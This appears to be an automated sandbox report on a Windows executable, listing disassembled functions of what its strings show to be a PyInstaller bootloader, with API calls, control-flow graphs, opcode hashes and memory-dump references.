                                                                                                                                                                                                                        • Opcode ID: 2a7e16f91217622cf63e4aa7e1876a82679c0958228dc097b747687202d79cc4
                                                                                                                                                                                                                        • Instruction ID: cfbdc4f515e3ee01d0ed49ddd8d4a38a5e900c9f640b6655f15961063b653d16
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a7e16f91217622cf63e4aa7e1876a82679c0958228dc097b747687202d79cc4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11718231A1CA8689EB20AF54DC802F9A3B1EB54784F8D503DD98D57757EF2CE544AF20
                                                                                                                                                                                                                        Function 00007FF7293415C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 245 7ff7293415c0-7ff7293415d1 246 7ff7293415f7-7ff729341611 call 7ff729343f70 245->246 247 7ff7293415d3-7ff7293415dc call 7ff729341050 245->247 254 7ff72934163b-7ff729341655 call 7ff729343f70 246->254 255 7ff729341613-7ff72934163a call 7ff729342760 246->255 252 7ff7293415ee-7ff7293415f6 247->252 253 7ff7293415de-7ff7293415e9 call 7ff7293425f0 247->253 253->252 261 7ff729341657-7ff72934166c call 7ff7293425f0 254->261 262 7ff729341671-7ff729341688 call 7ff72934f9f4 254->262 269 7ff7293417c5-7ff7293417c8 call 7ff72934f36c 261->269 267 7ff72934168a-7ff7293416a6 call 7ff729342760 262->267 268 7ff7293416ab-7ff7293416af 262->268 278 7ff7293417bd-7ff7293417c0 call 7ff72934f36c 267->278 271 7ff7293416c9-7ff7293416e9 call 7ff729354170 268->271 272 7ff7293416b1-7ff7293416bd call 7ff7293411f0 268->272 276 7ff7293417cd-7ff7293417df 269->276 282 7ff72934170c-7ff729341717 271->282 283 7ff7293416eb-7ff729341707 call 7ff729342760 271->283 279 7ff7293416c2-7ff7293416c4 272->279 278->269 279->278 284 7ff72934171d-7ff729341726 282->284 285 7ff7293417a6-7ff7293417ae call 7ff72935415c 282->285 292 7ff7293417b3-7ff7293417b8 283->292 288 7ff729341730-7ff729341752 call 7ff72934f6bc 284->288 285->292 294 7ff729341785-7ff72934178c 288->294 295 7ff729341754-7ff72934176c call 7ff72934fdfc 288->295 292->278 297 7ff729341793-7ff72934179c call 7ff729342760 294->297 300 7ff72934176e-7ff729341771 295->300 301 7ff729341775-7ff729341783 295->301 304 7ff7293417a1 297->304 300->288 303 7ff729341773 300->303 301->297 303->304 304->285
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                        • Opcode ID: c8e92000e8c0d35bf26484b1fd51c9233cb411720716b55f3f18d9f76b413dca
                                                                                                                                                                                                                        • Instruction ID: 707ce5ffe279302131d557bab18f5c7691fe3da0285260183d90b45e7daf863c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e92000e8c0d35bf26484b1fd51c9233cb411720716b55f3f18d9f76b413dca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151CD21B08A4282EA10BF51AD801B9A7B0FF54B94FCD113DDD0C576A7EF2CE554AF20
                                                                                                                                                                                                                        Function 00007FF729347FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                        • API String ID: 2895956056-699529898
                                                                                                                                                                                                                        • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction ID: 9cac8078272a749d2241b2c612fd4e23ba6f1d0becd481151b65530a86b2563f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9411231A0878191DA20AF24EC852AAB7B1FB89360F95033DE6AD477D6DF7CD0449F10
                                                                                                                                                                                                                        Function 00007FF7293411F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                        • Opcode ID: 61d4c9b777333495dd17fcee09f04e40fa43be73e6df83df76c61507694ec06d
                                                                                                                                                                                                                        • Instruction ID: 651fac9736e5ccbda3b60c18039e6870db851b600f91a187e4606428d49b0bdb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61d4c9b777333495dd17fcee09f04e40fa43be73e6df83df76c61507694ec06d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451E322A08A4241E620BF51AC803BAA670FB55794F8D113DED4D97B97EF3CE501AF20
                                                                                                                                                                                                                        Function 00007FF72935E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF72935E3BA,?,?,-00000018,00007FF72935A063,?,?,?,00007FF729359F5A,?,?,?,00007FF72935524E), ref: 00007FF72935E19C
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF72935E3BA,?,?,-00000018,00007FF72935A063,?,?,?,00007FF729359F5A,?,?,?,00007FF72935524E), ref: 00007FF72935E1A8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                        • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction ID: 32a7425f1d8b34f7a7f99a590ca6a964f04e6fe96ed9a28265c424f5d1866c7c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4841F62171960262EB25AF12ACC06B5A6F1FF0DB90F8D113DDD0D87786DE3CE505AA10
                                                                                                                                                                                                                        Function 00007FF729347C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF729343834), ref: 00007FF729347CE4
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF729343834), ref: 00007FF729347D2C
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347E10: GetEnvironmentVariableW.KERNEL32(00007FF72934365F), ref: 00007FF729347E47
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF729347E69
                                                                                                                                                                                                                          • Part of subcall function 00007FF729357548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF729357561
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293426C0: MessageBoxW.USER32 ref: 00007FF729342736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                        • API String ID: 740614611-1339014028
                                                                                                                                                                                                                        • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction ID: a873265a3c38fb33fe60d71860710e358e93a9307d8b133086d50601fea6874f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D741B011A1D64250EA24FF229CD52F99671EF49790FC9203DDD1E57797EE3CE500AE20
                                                                                                                                                                                                                        Function 00007FF72935AD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 572 7ff72935ad6c-7ff72935ad92 573 7ff72935adad-7ff72935adb1 572->573 574 7ff72935ad94-7ff72935ada8 call 7ff7293543d4 call 7ff7293543f4 572->574 576 7ff72935b187-7ff72935b193 call 7ff7293543d4 call 7ff7293543f4 573->576 577 7ff72935adb7-7ff72935adbe 573->577 592 7ff72935b19e 574->592 594 7ff72935b199 call 7ff729359bf0 576->594 577->576 579 7ff72935adc4-7ff72935adf2 577->579 579->576 582 7ff72935adf8-7ff72935adff 579->582 586 7ff72935ae18-7ff72935ae1b 582->586 587 7ff72935ae01-7ff72935ae13 call 7ff7293543d4 call 7ff7293543f4 582->587 590 7ff72935b183-7ff72935b185 586->590 591 7ff72935ae21-7ff72935ae27 586->591 587->594 595 7ff72935b1a1-7ff72935b1b8 590->595 591->590 596 7ff72935ae2d-7ff72935ae30 591->596 592->595 594->592 596->587 599 7ff72935ae32-7ff72935ae57 596->599 601 7ff72935ae8a-7ff72935ae91 599->601 602 7ff72935ae59-7ff72935ae5b 599->602 603 7ff72935ae93-7ff72935aebb call 7ff72935c90c call 7ff729359c58 * 2 601->603 604 7ff72935ae66-7ff72935ae7d call 7ff7293543d4 call 7ff7293543f4 call 7ff729359bf0 601->604 605 7ff72935ae5d-7ff72935ae64 602->605 606 7ff72935ae82-7ff72935ae88 602->606 635 7ff72935aebd-7ff72935aed3 call 7ff7293543f4 call 7ff7293543d4 603->635 636 7ff72935aed8-7ff72935af03 call 7ff72935b594 603->636 633 7ff72935b010 604->633 605->604 605->606 607 7ff72935af08-7ff72935af1f 606->607 610 7ff72935af9a-7ff72935afa4 call 7ff729362c2c 607->610 611 7ff72935af21-7ff72935af29 607->611 624 7ff72935b02e 610->624 625 7ff72935afaa-7ff72935afbf 610->625 611->610 614 7ff72935af2b-7ff72935af2d 611->614 614->610 618 7ff72935af2f-7ff72935af45 614->618 618->610 622 7ff72935af47-7ff72935af53 618->622 622->610 629 7ff72935af55-7ff72935af57 622->629 631 7ff72935b033-7ff72935b053 ReadFile 624->631 625->624 627 7ff72935afc1-7ff72935afd3 GetConsoleMode 625->627 627->624 632 7ff72935afd5-7ff72935afdd 627->632 629->610 634 7ff72935af59-7ff72935af71 629->634 637 7ff72935b14d-7ff72935b156 GetLastError 631->637 638 7ff72935b059-7ff72935b061 631->638 632->631 640 7ff72935afdf-7ff72935b001 ReadConsoleW 632->640 643 7ff72935b013-7ff72935b01d call 7ff729359c58 633->643 634->610 644 7ff72935af73-7ff72935af7f 634->644 635->633 636->607 641 7ff72935b158-7ff72935b16e call 7ff7293543f4 call 7ff7293543d4 637->641 642 7ff72935b173-7ff72935b176 637->642 638->637 646 7ff72935b067 638->646 648 7ff72935b003 GetLastError 640->648 649 7ff72935b022-7ff72935b02c 640->649 641->633 653 7ff72935b17c-7ff72935b17e 642->653 654 7ff72935b009-7ff72935b00b call 7ff729354368 642->654 643->595 644->610 652 7ff72935af81-7ff72935af83 644->652 656 7ff72935b06e-7ff72935b083 646->656 648->654 649->656 652->610 661 7ff72935af85-7ff72935af95 652->661 653->643 654->633 656->643 657 7ff72935b085-7ff72935b090 656->657 663 7ff72935b0b7-7ff72935b0bf 657->663 664 7ff72935b092-7ff72935b0ab call 7ff72935a984 657->664 661->610 668 7ff72935b13b-7ff72935b148 call 7ff72935a7c4 663->668 669 7ff72935b0c1-7ff72935b0d3 663->669 672 7ff72935b0b0-7ff72935b0b2 664->672 668->672 673 7ff72935b12e-7ff72935b136 669->673 674 7ff72935b0d5 669->674 672->643 673->643 676 7ff72935b0da-7ff72935b0e1 674->676 677 7ff72935b11d-7ff72935b128 676->677 678 7ff72935b0e3-7ff72935b0e7 676->678 677->673 679 7ff72935b0e9-7ff72935b0f0 678->679 680 7ff72935b103 678->680 679->680 681 7ff72935b0f2-7ff72935b0f6 679->681 682 7ff72935b109-7ff72935b119 680->682 681->680 683 7ff72935b0f8-7ff72935b101 681->683 682->676 684 7ff72935b11b 682->684 683->682 684->673
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction ID: 09fbe83cbfeb74fe244d6aa66fb7a1d160c6becd140914a9a76f05f34469e658
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69C1F36290C68662E650AF159C842BDBF70FB9CB80F9D013DD94D43693CF7CE419AB20
                                                                                                                                                                                                                        Function 00007FF729347B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                        • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction ID: 25f26e2868bc71579c7d2ed4a4396f7846554d78e6d2d0df3040486bcefa540d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C521A0CA4241EB10AF55ECC4269E7B1EF857A4F99023CD6AD43BD6DF7CD8449F10
                                                                                                                                                                                                                        Function 00007FF7293433E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF729343534), ref: 00007FF729343411
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: GetLastError.KERNEL32(?,?,?,00007FF72934342E,?,00007FF729343534), ref: 00007FF729342A14
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: FormatMessageW.KERNEL32(?,?,?,00007FF72934342E), ref: 00007FF729342A7D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293429E0: MessageBoxW.USER32 ref: 00007FF729342ACF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                        • API String ID: 517058245-2863816727
                                                                                                                                                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction ID: 0f81f02dffbc7e94dbb5e455ace8814c6d5a9a29eb591cf29e7583a9ea660d47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2218051B0858291EE21BF21EC913FAA270FF48354FCA113ED65D876E7EE2CD104AB24
                                                                                                                                                                                                                        Function 00007FF729348400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: GetCurrentProcess.KERNEL32 ref: 00007FF729347B70
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: OpenProcessToken.ADVAPI32 ref: 00007FF729347B83
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: GetTokenInformation.KERNELBASE ref: 00007FF729347BA8
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: GetLastError.KERNEL32 ref: 00007FF729347BB2
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: GetTokenInformation.KERNELBASE ref: 00007FF729347BF2
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF729347C0E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729347B50: CloseHandle.KERNEL32 ref: 00007FF729347C26
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF729343814), ref: 00007FF72934848C
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF729343814), ref: 00007FF729348495
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                        • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction ID: 3fc90524c10bda8a37efaa68ed9620de800e39387727b6969ca818984b34563c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05213221A0864151E650BF11EC952EAA3B0FF88780FC9543DEA4D53797DF3CD944DB60
                                                                                                                                                                                                                        Function 00007FF72935C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
